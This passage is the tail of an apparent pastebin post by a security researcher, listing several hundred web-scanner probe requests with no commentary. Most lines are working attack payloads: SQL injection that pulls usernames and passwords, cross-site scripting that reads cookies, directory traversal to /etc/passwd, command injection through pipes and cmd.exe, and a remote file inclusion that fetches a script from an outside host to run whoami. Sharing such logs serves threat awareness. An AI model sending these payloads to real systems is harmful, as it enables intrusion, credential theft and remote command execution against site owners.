  705. /index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
  706. /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20informa
  707. /index.php?option=search&searchword=<script>alert(document.cookie);</script>
  708. /invoker/JMXInvokerServlet
  709. /jmx-console/
  710. /jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer
  711. /kboard/
  712. /lists/admin/
  713. /mambo/index.php?Itemid=u2Ia3
  714. /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>
  715. /modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>
  716. /modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;
  717. /modules/My_eGallery/public/displayCategory.php
  718. /mpcgi/admin.cgi
  719. /mpcgi/architext_query.pl
  720. /mpcgi/banner.cgi
  721. /mpcgi/bannereditor.cgi
  722. /mpcgi/bb-ack.sh
  723. /mpcgi/bb-histlog.sh
  724. /mpcgi/bb-rep.sh
  725. /mpcgi/bb-replog.sh
  726. /mpcgi/bbs_forum.cgi
  727. /mpcgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  728. /mpcgi/csPassword.cgi
  729. /mpcgi/csPassword/csPassword.cgi
  730. /mpcgi/cutecast/members/
  731. /mpcgi/day5datanotifier.cgi
  732. /mpcgi/db2www/library/document.d2w/show
  733. /mpcgi/index.php
  734. /mpcgi/logs/error_log
  735. /mpcgi/lookwho.cgi
  736. /mpcgi/maillist.cgi
  737. /mpcgi/maillist.pl
  738. /mpcgi/man.sh
  739. /mpcgi/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
  740. /mpcgi/responder.cgi
  741. /mpcgi/rguest.exe
  742. /mpcgi/rksh
  743. /mpcgi/rsh
  744. /mpcgi/search.cgi
  745. /mpcgi/tablebuild.pl
  746. /mpcgi/tcsh
  747. /mpcgi/test.cgi
  748. /mpcgi/test/test.cgi
  749. /mpcgi/textcounter.pl
  750. /mpcgi/webwho.pl
  751. /mpcgi/wguest.exe
  752. /mpcgi/wwwboard.cgi.cgi
  753. /mpcgi/wwwboard.pl
  754. /mpcgi/www-sql
  755. /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
  756. /msadc/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG
  757. /My_eGallery/public/displayCategory.php
  758. /nosuchurl/><script>alert('Vulnerable')</script>
  759. /ows-bin/
  760. /ows-bin/.cobalt
  761. /ows-bin/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
  762. /ows-bin/.fhp
  763. /ows-bin/adduser.cgi
  764. /ows-bin/admin.php
  765. /ows-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
  766. /ows-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
  767. /ows-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
  768. /ows-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
  769. /ows-bin/architext_query.pl
  770. /ows-bin/astrocam.cgi
  771. /ows-bin/banner.cgi
  772. /ows-bin/bannereditor.cgi
  773. /ows-bin/bb-ack.sh
  774. /ows-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
  775. /ows-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
  776. /ows-bin/bb-histlog.sh
  777. /ows-bin/bb-rep.sh
  778. /ows-bin/bb-replog.sh
  779. /ows-bin/bbs_forum.cgi
  780. /ows-bin/blog/mt-check.cgi
  781. /ows-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  782. /ows-bin/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
  783. /ows-bin/c99.php
  784. /ows-bin/calendar
  785. /ows-bin/calendar/index.cgi
  786. /ows-bin/cart.pl
  787. /ows-bin/cart.pl?db='
  788. /ows-bin/cart32.exe
  789. /ows-bin/cgiwrap/~adm
  790. /ows-bin/cgiwrap/~daemon
  791. /ows-bin/cgiwrap/~GujG2
  792. /ows-bin/cgiwrap/~listen
  793. /ows-bin/cgiwrap/~unknown
  794. /ows-bin/classifieds/index.cgi
  795. /ows-bin/clickresponder.pl
  796. /ows-bin/common/listrec.pl
  797. /ows-bin/count.cgi
  798. /ows-bin/csPassword.cgi
  799. /ows-bin/csPassword/csPassword.cgi
  800. /ows-bin/cutecast/members/
  801. /ows-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
  802. /ows-bin/date
  803. /ows-bin/day5datanotifier.cgi
  804. /ows-bin/db2www/library/document.d2w/show
  805. /ows-bin/dcshop/orders/orders.txt
  806. /ows-bin/echo.bat
  807. /ows-bin/echo.bat?&dir+c:\\\\
  808. /ows-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
  809. /ows-bin/environ.pl
  810. /ows-bin/excite;IFS=\\"$\\";/bin/cat
  811. /ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
  812. /ows-bin/formmail
  813. /ows-bin/formmail.pl
  814. /ows-bin/guestbook/passwd
  815. /ows-bin/hello.bat?&dir+c:\\\\
  816. /ows-bin/ikonboard/help.cgi?
  817. /ows-bin/ImageFolio/admin/admin.cgi
  818. /ows-bin/jailshell
  819. /ows-bin/logs/error_log
  820. /ows-bin/lookwho.cgi
  821. /ows-bin/ls
  822. /ows-bin/mailit.pl
  823. /ows-bin/maillist.cgi
  824. /ows-bin/maillist.pl
  825. /ows-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
  826. /ows-bin/man.sh
  827. /ows-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
  828. /ows-bin/mrtg.cgi?cfg=blah
  829. /ows-bin/MsmMask.exe?mask=/junk334
  830. /ows-bin/mt-static/mt-check.cgi
  831. /ows-bin/nbmember.cgi?cmd=list_all_users
  832. /ows-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
  833. /ows-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
  834. /ows-bin/nlog-smb.pl
  835. /ows-bin/nph-test-cgi
  836. /ows-bin/opendir.php?/etc/passwd
  837. /ows-bin/perlidlc.bat?&dir
  838. /ows-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
  839. /ows-bin/php.ini
  840. /ows-bin/post-query
  841. /ows-bin/responder.cgi
  842. /ows-bin/rguest.exe
  843. /ows-bin/rksh
  844. /ows-bin/robpoll.cgi
  845. /ows-bin/rsh
  846. /ows-bin/scgiwrap
  847. /ows-bin/scripts/*%0a.pl
  848. /ows-bin/search.cgi
  849. /ows-bin/shop/orders/orders.txt
  850. /ows-bin/spin_client.cgi?aaaaaaaa
  851. /ows-bin/stat/
  852. /ows-bin/store/index.cgi?page=../../../../../../../../etc/passwd
  853. /ows-bin/tablebuild.pl
  854. /ows-bin/tcsh
  855. /ows-bin/test.cgi
  856. /ows-bin/test/test.cgi
  857. /ows-bin/test_cgi.pl
  858. /ows-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
  859. /ows-bin/test-env
  860. /ows-bin/textcounter.pl
  861. /ows-bin/update.dpgs
  862. /ows-bin/uptime
  863. /ows-bin/webdriver
  864. /ows-bin/Webnews.exe
  865. /ows-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
  866. /ows-bin/webutil.pl
  867. /ows-bin/webwho.pl
  868. /ows-bin/wguest.exe
  869. /ows-bin/wwwboard.cgi.cgi
  870. /ows-bin/wwwboard.pl
  871. /ows-bin/www-sql
  872. /phpBB/My_eGallery/public/displayCategory.php
  873. /phpBB2/search.php?search_id=1\\\\
  874. /phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
  875. /pls/sample/admin_/help/..%255cplsql.conf
  876. /postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
  877. /postnuke/html/My_eGallery/public/displayCategory.php
  878. /postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
  879. /postnuke/My_eGallery/public/displayCategory.php
  880. /profile.php?u=6Pi2f3zm
  881. /samples/sample_posteddata.php
  882. /scgi-bin/architext_query.pl
  883. /scgi-bin/banner.cgi
  884. /scgi-bin/bannereditor.cgi
  885. /scgi-bin/bb-ack.sh
  886. /scgi-bin/bb-histlog.sh
  887. /scgi-bin/bb-rep.sh
  888. /scgi-bin/bb-replog.sh
  889. /scgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  890. /scgi-bin/csPassword.cgi
  891. /scgi-bin/csPassword/csPassword.cgi
  892. /scgi-bin/cutecast/members/
  893. /scgi-bin/day5datanotifier.cgi
  894. /scgi-bin/logs/error_log
  895. /scgi-bin/lookwho.cgi
  896. /scgi-bin/maillist.cgi
  897. /scgi-bin/maillist.pl
  898. /scgi-bin/responder.cgi
  899. /scgi-bin/rguest.exe
  900. /scgi-bin/rksh
  901. /scgi-bin/rsh
  902. /scgi-bin/search.cgi
  903. /scgi-bin/tablebuild.pl
  904. /scgi-bin/tcsh
  905. /scgi-bin/test.cgi
  906. /scgi-bin/test/test.cgi
  907. /scgi-bin/webwho.pl
  908. /scgi-bin/wguest.exe
  909. /scgi-bin/wwwboard.cgi.cgi
  910. /scgi-bin/www-sql
  911. /scripts/architext_query.pl
  912. /scripts/banner.cgi
  913. /scripts/bannereditor.cgi
  914. /scripts/bb-ack.sh
  915. /scripts/bb-histlog.sh
  916. /scripts/bb-rep.sh
  917. /scripts/bb-replog.sh
  918. /scripts/bbs_forum.cgi
  919. /scripts/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  920. /scripts/csPassword.cgi
  921. /scripts/csPassword/csPassword.cgi
  922. /scripts/cutecast/members/
  923. /scripts/day5datanotifier.cgi
  924. /scripts/iisadmin/bdir.htr
  925. /scripts/iisadmin/ism.dll
  926. /scripts/logs/error_log
  927. /scripts/lookwho.cgi
  928. /scripts/maillist.cgi
  929. /scripts/maillist.pl
  930. /scripts/man.sh
  931. /scripts/no-such-file.pl
  932. /scripts/responder.cgi
  933. /scripts/rguest.exe
  934. /scripts/rksh
  935. /scripts/rsh
  936. /scripts/samples/details.idc
  937. /scripts/search.cgi
  938. /scripts/tablebuild.pl
  939. /scripts/tcsh
  940. /scripts/test.cgi
  941. /scripts/test/test.cgi
  942. /scripts/textcounter.pl
  943. /scripts/tools/ctss.idc
  944. /scripts/webwho.pl
  945. /scripts/wguest.exe
  946. /scripts/wwwboard.cgi.cgi
  947. /scripts/wwwboard.pl
  948. /scripts/www-sql
  949. /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml
  950. /search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
  951. /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
  952. /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
  953. /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
  954. /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
  955. /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
  956. /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
  957. /site/'
  958. /SiteServer/Admin/commerce/foundation/domain.asp
  959. /SiteServer/Admin/commerce/foundation/driver.asp
  960. /SiteServer/Admin/commerce/foundation/DSN.asp
  961. /SiteServer/admin/findvserver.asp
  962. /SiteServer/Admin/knowledge/dsmgr/default.asp
  963. /SiteServer/Knowledge/Default.asp?ctr=\\"><script>alert('Vulnerable')</script>
  964. /soinfo.php?\\"><script>alert('Vulnerable')</script>
  965. /splashAdmin.php
  966. /ssdefs/
  967. /sshome/
  968. /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
  969. /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
  970. /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
  971. /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
  972. /sysinfo.pl
  973. /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
  974. /test
  975. /test.cgi
  976. /test.cgi.php
  977. /test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
  978. /test.py
  979. /test.sh
  980. /test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
  981. /test_cgi.php
  982. /test_cgi.pl
  983. /test-cgi
  984. /test-cgi.pl
  985. /themes/default/layouts/standard.php?page_include=http://cirt.net/rfiinc.txt??&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
  986. /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
  987. /ticket.php?id=99999
  988. /tiki/
  989. /tiki/tiki-install.php
  990. /TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
  991. /TiVoConnect?Command=QueryServer
  992. /tmUnblock.cgi
  993. /TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
  994. /tsweb/
  995. /tws/getStatus
  996. /uname.cgi
  997. /upload.php?type=\\"<script>alert(document.cookie)</script>
  998. /user.php?op=userinfo&uname=<script>alert('hi');</script>
  999. /usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
  1000. /userinfo.php?uid=1;
  1001. /users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
  1002. /vgn/login/1,501,,00.html?cookieName=x--\\>
  1003. /vgn/performance/TMT
  1004. /vgn/performance/TMT/Report
  1005. /vgn/performance/TMT/Report/XML
  1006. /vgn/performance/TMT/reset
  1007. /vgn/ppstats
  1008. /vgn/previewer
  1009. /vgn/record/previewer
  1010. /vgn/style
  1011. /vgn/stylepreviewer
  1012. /vgn/vr/Deleting
  1013. /vgn/vr/Editing
  1014. /vgn/vr/Saving
  1015. /vgn/vr/Select
  1016. /viewcvs.cgi
  1017. /webamil/test.php
  1018. /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
  1019. /webcgi/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
  1020. /webcgi/architext_query.pl
  1021. /webcgi/bannereditor.cgi
  1022. /webcgi/bb-ack.sh
  1023. /webcgi/bb-histlog.sh
  1024. /webcgi/bb-rep.sh
  1025. /webcgi/bb-replog.sh
  1026. /webcgi/bbs_forum.cgi
  1027. /webcgi/bizdb1-search.cgi
  1028. /webcgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
  1029. /webcgi/csPassword/csPassword.cgi
  1030. /webcgi/cutecast/members/
  1031. /webcgi/day5datanotifier.cgi
  1032. /webcgi/db2www/library/document.d2w/show
  1033. /webcgi/logs/error_log
  1034. /webcgi/lookwho.cgi
  1035. /webcgi/maillist.cgi
  1036. /webcgi/maillist.pl
  1037. /webcgi/man.sh
  1038. /webcgi/rguest.exe
  1039. /webcgi/rksh
  1040. /webcgi/rsh
  1041. /webcgi/search.cgi
  1042. /webcgi/tcsh
  1043. /webcgi/test.cgi
  1044. /webcgi/test/test.cgi
  1045. /webcgi/textcounter.pl
  1046. /webcgi/tst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
  1047. /webcgi/webwho.pl
  1048. /webcgi/wguest.exe
  1049. /webcgi/wwwboard.cgi.cgi
  1050. /webcgi/wwwboard.pl
  1051. /webcgi/www-sql
  1052. /webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\"Vulnerable\\")</script>&email1=<script>alert%20(\\"Vulnerable\\")</script>
  1053. /web-console/ServerInfo.jsp
  1054. /web-console/ServerInfo.jsp%00
  1055. /webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
  1056. /welcome
  1057. /whois.cgi
  1058. /ws_ftp.ini
  1059. /z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
  1060. *******
  1061. More FROM @neonprimetime security
  1062.  
  1063. http://pastebin.com/u/Neonprimetime
  1064. https://www.virustotal.com/en/USER/neonprimetime/
  1065. https://twitter.com/neonprimetime
  1066. https://www.reddit.com/USER/neonprimetime
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement